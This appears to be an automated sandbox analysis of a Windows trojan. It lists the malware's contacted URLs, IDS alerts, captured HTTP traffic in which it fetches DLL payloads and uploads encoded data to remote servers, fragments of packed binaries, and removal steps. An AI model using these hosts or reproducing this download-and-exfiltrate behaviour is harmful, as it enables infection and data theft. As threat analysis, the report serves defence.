Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 1241088 997888 5.54504 e5ed7707c28615a52252d3ddbe66e1f9
.rsrc 1245184 12288 9728 4.44571 eed794cfda96ae8b48640339bb781167

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.58sky.com/index/getcfg?id=58999 119.97.143.58
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://1212.ip138.com/ic.asp 183.238.101.232
hxxp://www.ip.cn/
hxxp://ip.dnsexit.com/
hxxp://5636.ecoma.ourwebpic.com/d2/wblm.dll
hxxp://client.sndo.com/s.json?g=MTUwNDU5MjQ4MDQ3NzAwMO9UrQUPZeovcXd7lISxliFM*I2t9GMztLzd-4Ss2V4S3GgKOk*3LI4Oyjm-VUvqyyFwAK9z4Z4s1uy*4kWckxeiZwMqDefR6BZFaQ-h6dpY4cbddl2-6ecos02yEpW6g3XH1RakoVsIZKoU6dEw5M*EmOFPF8d4dIxESMPX7f9n7L7fioXfvnh*xr8IXI31xn4coZKX2PBJAHwp*YF-0TA-HDyeBaK35xay6L-eYOcu 182.140.215.83
hxxp://client.sndo.com/putdata?type=2 182.140.215.83
hxxp://www.ip138.com/ 87.245.198.83
hxxp://dld.jxwan.com/d2/wblm.dll 87.245.198.83
hxxp://dld.jxwan.com/d2/x86.dll 87.245.198.83
hxxp://i.sndo.com/putdata?type=2 182.140.215.83
hxxp://www.go890.com/d2/CDClient.dll 87.245.198.83
xxx.baidustatie.com 182.140.215.71


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY External IP Lookup - www.ip.cn
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

......................................................................
..........................................................


HTTP/1.1 400 Bad Request

Server: nginx/1.12.0
Date: Tue, 05 Sep 2017 03:21:20 GMT
Content-Type: text/html
Content-Length: 173
Connection: close
<html>..<head><title>400 Bad Request</title>&l
t;/head>..<body bgcolor="white">..<center><h1>400
Bad Request</h1></center>..<hr><center>nginx/
1.12.0</center>..</body>..</html>....


HEAD /d2/x86.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 22:46:31 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....



GET /d2/x86.dll HTTP/1.1

Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 22:46:31 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L....m`X...........!........
........P.....................................................@.......
..........................x...........x...................p...........
............................$...H.....................................
......UPX0....................................UPX1....................
............@....rsrc...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!.......RXh...o..O...."..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.......9........&..t..C<.D.x...3<...;.u.|.H.^.
..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M

<<< skipped >>>

GET /index/getcfg?id=58999 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200
Server: nginx/1.8.1
Date: Tue, 05 Sep 2017 03:20:59 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
400a..............Y..H..._..x. .F-...Y.Y3..y.......EJ.(j%uE.P...c.1...
.....;M4.r.......r..../.f..../........_....l..(.......o__...L...r.]...
....V..).,~....%.7..z./..tW../..&..M...\.l...........s=..F.\...g.....m
.7j.......Q...q.;.F.I.v.....c........cv. W..d.X.......[}M.o_....f..g..
"./...|.D............n.......l.m;......P>..cz......6.d...}.g~...g.e
..p...T......f..D.>].....,..'.-.......S3.?.........n.;....p.w.v.=..
.....|.S....'h.K..s;..%.6}<.s.f.........m. ....V...wol%y....j._.=.&
lt;Y....m.....Y....Bf.<...p.m.{6.9..N.1 Ry.A../.MTH..Y.fu.....^\a..
j..U.}}Z.....ux.w...........=.wi....O....u../.......... .e..../.....R.
._.2......7...{..`0....^J..9^........0....._..b.....L. Cn........:....
L....Y.....E.J....k.}vG.........L..|..\.-U..9Z....=.w.K...S..i..3..k..
...|.)....d...`.................%..dK..U~9....G.H.l<.s.^........m..
.e../...r...,.].o_.i'..Y."H..]5i^........aK...7...zNF........~.l......
V_6./...........?....b...y......~=6............o........f..s..[...r{..
..)..;.X}....v..o./..H.......}....{..Of../..Lz../...g.t3\...6...WQ....
...7[.......w....v.P')..KQ..g."~..%..9OZ...........lD.Ciw..&......>
.._.[A.J.m.F-.y....Xw.CZ_.v....o.....&].>.........7.B7.....!.BJ....
.x..qb...7...w.....<..........^]fFe.b.......Y..Fj.....,_m.....X..My
}...T.w....|...5..O..3m....-g..fv.z79=_,.G.2=s.[Tx..'.....$=.R...?>
..@o..#.2..<..........\.6{.F.ki......,....."y.*..W...Q.. 6e........
..|...D.`...1:~kv[T4.|..p2....-J..*.....K'x{z..s(..&....0.....X.I.z..-
..i./......e....hw...... Kh{...1.s&.....% .,.k....N...M.e.#.....N.

<<< skipped >>>

GET /s.json?g=MTUwNDU5MjQ4MDQ3NzAwMO9UrQUPZeovcXd7lISxliFM*I2t9GMztLzd-4Ss2V4S3GgKOk*3LI4Oyjm-VUvqyyFwAK9z4Z4s1uy*4kWckxeiZwMqDefR6BZFaQ-h6dpY4cbddl2-6ecos02yEpW6g3XH1RakoVsIZKoU6dEw5M*EmOFPF8d4dIxESMPX7f9n7L7fioXfvnh*xr8IXI31xn4coZKX2PBJAHwp*YF-0TA-HDyeBaK35xay6L-eYOcu HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate,sdch
Connection: Close
Accept-Charset: GBK,utf-8
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: client.sndo.com


HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Tue, 05 Sep 2017 03:21:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.30
298..MWY3MGU5YmY4ZTVlMTJlM-1EQUmfwC22yoiyGOQZH*bkPGdpJFXbzm4uEz38ZCMsm
NSOAy4C8shc4SQ5Ha909kx28LWhNeMxTNChqr9MxjgHO6tU3soJ3s6Sj7q7Au6TzyJZEBa
j*7BjEw-EJNeNARQ51W5IZ61PpG5A*jCWIRdV8u6sk2cOavfDLMzjIJe4u0SLESE1ouB3c
R6-0ANToqTls-eq6hvjjqLE0Kslch9XRyA-w03CDJ2whU5k6XPUdJ8lw6W-Q*HXzZV1wsm
1sJ4NFyymBBPbv1WN*ab6TRcmHkbqK7n4bhXc4uw4aUlaNncuNE77bPHrCSANtHAayC9yU
j2O6*-EX-7dFGhphBI4KRvOjdhiMU3Te6NNlYx7IUpFtRmndZheXNIjrdmSalXFz4XqIAc
DMP7bakbUQA6rjlPPhM-LdL5Lqff*Uwjh7RI6noE9fYFM1laiC32Em-KJ*ZC1ILHUbjneJ
uwiMNrjR8ndtQPdTYLL7sQsCocWw6Hrv8OVa7Jw*qJw7ez7QVscOs7DLEQpE8z7Tc5nVg7
WcTBgwpIBDBlHczUZc64V7OYNS3ZNOB90D3omKzIWlUk7AbibIez3VUKcA-0cKdmhjfNct
USBjzjYEdLtDe-JYJMbzKWsInltVMR85iY*4A==..0..


GET / HTTP/1.1
Host: ip.dnsexit.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Tue, 05 Sep 2017 03:21:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 17
Connection: close
Content-Type: text/html; charset=UTF-8
 .194.242.96.218 ..


GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 05 Sep 2017 03:21:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 1266
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>.....
.......</TITLE>..<META HTTP-EQUIV="Content-Type" Content="tex
t/html; charset=GB2312">..<STYLE type="text/css">.. BODY { f
ont: 9pt/12pt .... }.. H1 { font: 12pt/15pt .... }.. H2 { font: 9pt/
12pt .... }.. A:link { color: red }.. A:visited { color: maroon }..&
lt;/STYLE>..</HEAD><BODY><TABLE width=500 border=0 c
ellspacing=10><TR><TD>..<h1>............</h1&g
t;................................................<hr>..<p>
;................</p>..<ul>..<li>....<a href="jav
ascript:location.reload()">....</a>..................</li&
gt;..<li>.............................................. URL ....
..............</li>..</ul>..<h2>HTTP .... 500.13 - .
...........Web ............<br>Internet ........ (IIS)</h2>
;..<hr>..<p>..............................</p>..<
ul>..<li>.... <a href="hXXp://go.microsoft.com/fwlink/?lin
kid=8180">Microsoft ............</a>..........“HTTP&rdq
uo;..“500”........</li>..<li>....“IIS ..
..”...... IIS ...... (inetmgr) ........................“..
........ Web ............”..“......................”
..“..................”........</li>..</ul>..&l
t;/TD></TR></TABLE></BODY></HTML>....

<<< skipped >>>

POST /putdata?type=2 HTTP/1.1
Content-Type: application/json;charset=utf-8
Content-Length: 1752
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: i.sndo.com
Connection: Close

Aq/8JSut/83iY/kc871DLOdz8Cw/b1Oup5usm9/NJOyaJwEGCdXUk3/0Ck6BYmTBoKsV2 SwHpXnoc/VomMjpGQwE aCM6qQPkrW4qrPX79PgaCy0aSLYrClupy6s8Fr2TSCPXhSp3GKSXeeYI1EM5CztmUiN7sPlyID3DDf5BzacJZkOlcNS6X86Tht3fyLf0pj1fjpdyTz//rS47xMopZFwBWukyukQ3DbhECC53/u3vvs36Pncb/hOxUMg7jvYe zyJvKyMhpAUubQt4jMEPHkEJqnhz8z63HWpgsjswCB8Hz0UlCLEzhuLbAeHLKIct3r8Po1g3sP fyfc7pY34PPlMTY8vuxcb/gPE50p6eHa3UPqpgjvuD3o FBrn09h8kJC1tCQYy/eGHYhnTQK/iTbvZP5ov2xNAlDKjgIR05gddRdEn0Mds7mIJZ68UA9gr7ph x2ANYAAOnIHvn0lK9 A6GxODTmb1vADH5/n84qmrW I ctKd94nsFJtsuGqtioEwrILQYHTYsD1u8GjmpaQlSZLBciC5698DJH7INS8rPmWVgYOhKXm2gdp2Cwqc1ZEiRUzgobz1yxFIVHOpZ/pQx2GB/wgAFOpCWb/WYg5ECStRhRoAVUoWz3csAYmFU42IAbi2vpWSwFWcnawTwbXqsLikLyNsa0EztmzORjSQ9VXCVU3G0L3dGe8xTCsfevPEx EbR6ppVpuqYeoP1zD2ic5z1d/DPtrWHw9/MfSl9KOgCS8T3YQqoTld9oqKeOtwwet0R6vJT69Xpd2onZxIN5UknLDLD9wgW48yx/PUCHmu3K/k4pZbBLC58qpZmsal7YpSHYEz3ppUDqC3vNP8UrIjajP/VrZJfWsKyEzjmL8TrCqmH3C6xuLk2u6pGd8u5H0vX4e7BoSXKilp5RCNHbIFOsvuBUm7ZQYH0tnzi9xSAwImUJPFhuLgzGupZ0i WaGQsMZHYFVIAaZihoK1LsAlCy65SunPk5a8tOycAiBbe2V1Y9MwzOgcZq1fD6sTCos45fxumeFuRM l fvpaCjp3WCDBxqesQN2AVFNrVP2ahNGaVx/iVMYP1Jmy8VDXGnu68KD3rdsmJthFaO6bVvEGMLBADqaGQkSk1EUXRb/r3PobKOQACQRX qycYbeNhhkvXnGY1OzCMEId1X2Iej1D/SEmfrqIuChsLaONscLxqRT7jlMuAmiITre/F0RABT0dfg4KzwgRyDf3MXl8YZY8T/E6fe6T4S92pZa6WR8DXKHJM3f
HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Tue, 05 Sep 2017 03:21:23 GMT
Transfer-Encoding: chunked
Connection: close
0..


GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 10:22:22 GMT
Content-Length: 19152
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Mon, 21 Aug 2017 04:05:37 GMT
Accept-Ranges: bytes
ETag: "a47bb4be321ad31:10bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 61129
X-Via: 1.1 PSbjwjBGP2vu136:3 (Cdn Cache Server V2.0), 1.1 dxin178:6 (Cdn Cache Server V2.0), 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html>..<html>...<head>....<meta charset
="gb2312">....<meta name="mobile-agent" content="format=html5; u
rl=hXXp://m.ip138.com/">....<title>IP........--..............
.... | ............ | ............ | ........................</titl
e>....<meta name="keywords" content="ip,IP....,IP........,ip138"
/>....<meta name="description" content="ip,IP....,IP........,ip1
38"/>....<script type="text/javascript">.....<!--......if(
window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com
/';.....//-->....</script>....<style type="text/css">..
...html{color:#000;background:#FFF}body,div,dl,dt,dd,ul,ol,li,h1,h3,h3
,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th
,td{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0
}fieldset,img{border:0}address,caption,cite,code,dfn,em,strong,th,var{
font-style:normal;font-weight:normal}ol,ul{list-style:none}caption,th{
text-align:left}h1,h3,h3,h4,h5,h6{font-size:100%;}q:before,q:after{con
tent:''}abbr,acronym{border:0;font-variant:normal}sup{vertical-align:t
ext-top}sub{vertical-align:text-bottom}input,textarea,select{font-fami
ly:inherit;font-size:inherit;font-weight:inherit;*font-size:100%}legen
d{color:#000}.....html{height:100%;}.....body{height:100%;font-size:14
px;font-family: Arial,Helvetica,"Microsoft Yahei";color:#333;}.....tab
le{table-layout:fixed;border-collapse: collapse;border-spacing: 0;marg
in: 0 auto;}.....input,button{font-family: Tahoma,Arial, Helvetica

<<< skipped >>>

HEAD /d2/wblm.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:26:47 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 18 Aug 2017 03:03:47 GMT
Content-Type: application/octet-stream
Content-Length: 489984
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....



GET /d2/wblm.dll HTTP/1.1

Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:26:47 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 18 Aug 2017 03:03:47 GMT
Content-Type: application/octet-stream
Content-Length: 489984
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$.......6.s.r...r...
r.......w...$...{...r...[.......z...!...p.....@.t.......b.......v.....
..w.......p.......w...r...........A.......s...Richr...................
........PE..L...$U.Y...........!.................0....... ............
...................`...............................................@..
.............................?........................................
...............................................text...................
............`....rdata...0... ......................@....data........P
......................@....rsrc...............................@....rel
oc... ...........V..............@....aspack.. ...0.......f............
..`....adata.......P.......z..............@...........................
......................................................................
......................................................................
............................................(..2....3...$....0.BP.AcAl
d..$H!=. .1..BA.T..U...5....l....u........<.y[k.e.j.F..T..`..l...l.
!.a3.3!<.^.n.....?B............VB.. .\.9.`.L........^Ajr.W. ^@.NH&g
t;..n...^@.s$}9.v.A.......{....~}........O9..~?=.=....._.X.!.#.;../..\
w...[....u,\....o@.....wE.....ZQ../..*...`..G.J...1.R.L...J.....H..]..
................X...............H"`.....&{.;.\../..5.)....D..R...#.[..
...b..U;Y.B...R.@`.......4..\...Z.e.(......PlF..K..j!K,...t%..ax..}...
..H;..a.h..Vj....k....JL...Z..o."r...3I..}.R .......VB.. .]...1.p7

<<< skipped >>>

GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 22:50:24 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 04 Sep 2017 09:43:48 GMT
Content-Type: application/octet-stream
Content-Length: 963072
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....f..........(u............@................................./p....
..................................<...R.......m....................
......................................................................
.................CODE....................PEC2^O...... ....rsrc....0...
....".................. ....reloc..............................@......
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
................................................$..b.. .........c....X
.........b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7
i.....8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.
*{?..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<.
......].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K......
....Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R.
......O.....X}l.Yf.......c.|#..'.C<..tNk..qx..@=....EW._..v....(^..
....x..".=o;......?.4....(.$...t..8.R*#....].Q[a....IAK...y.M..c.c

<<< skipped >>>

GET / HTTP/1.1
Host: VVV.ip.cn
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length:   95
Pragma: no-cache
Cache-control: no-store
<html><body><script>var en="",fn="",co,ao=new Array(
),bo;function cn(dn){for(co=0;co<bo.length;co )ao[co]=bo.charCodeA
t(co);co="for(co=49;;co--){if(co<4)break;ao[co]=((((ao[co] 42)&0xff
)<<7)&0xff)|(((ao[co] 42)&0xff)>>1);ao[co]=(-ao[co])&0xff;
}";eval(co);co=49;do{ao[co]=(((ao[co] 220)&0xff)>>5)|((((ao[co]
220)&0xff)<<3)&0xff);ao[co]=ao[co]^112;}while(--co>=3);for(co
=49;co>=2;){ao[co]=(((~ao[co])&0xff) 250)&0xff;ao[co]=(-ao[co])&0xf
f;co--;}bo="";for(co=1;co<ao.length-1;co )if(co%6)bo =String.fromC
harCode(ao[co]^dn);eval("co=eval");co(bo);}bo="\xdc\x06\x111\xf0\xb7\x
ee\xad\x85\xb7\xed0:u\x070u\xc6\x05\x80\xc7\xc3v,\xfc\xed-\xf77B\x12\x
f0\xf0p\xf0\xad\x03\x80\xc6wu\x06\xbc\x80\xbb\xac0\xf6\x97wSX\xd3";cn(
113);</script><script>var u=2;for(;u==1;u );</script&g
t;<br><br><br><center><h3><p>‹
BF;问本页面,您的浏&#x
89C8;器需要支持JavaScript</p></
h3></center></body></html>..


The Trojan connects to the servers at the following location(s):

SearchProtocolHost.exe_3992:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_3640:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

svchost.exe_1640:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3676
    adca3c78dafc4406e4d0862872e8236.exe:260

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe (7948 bytes)
    C:\Windows\LqYWOJJH.dll (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\r[1].json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\r[1].json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\r[2].json (1 bytes)
    C:\Windows\CLOG.txt (87 bytes)
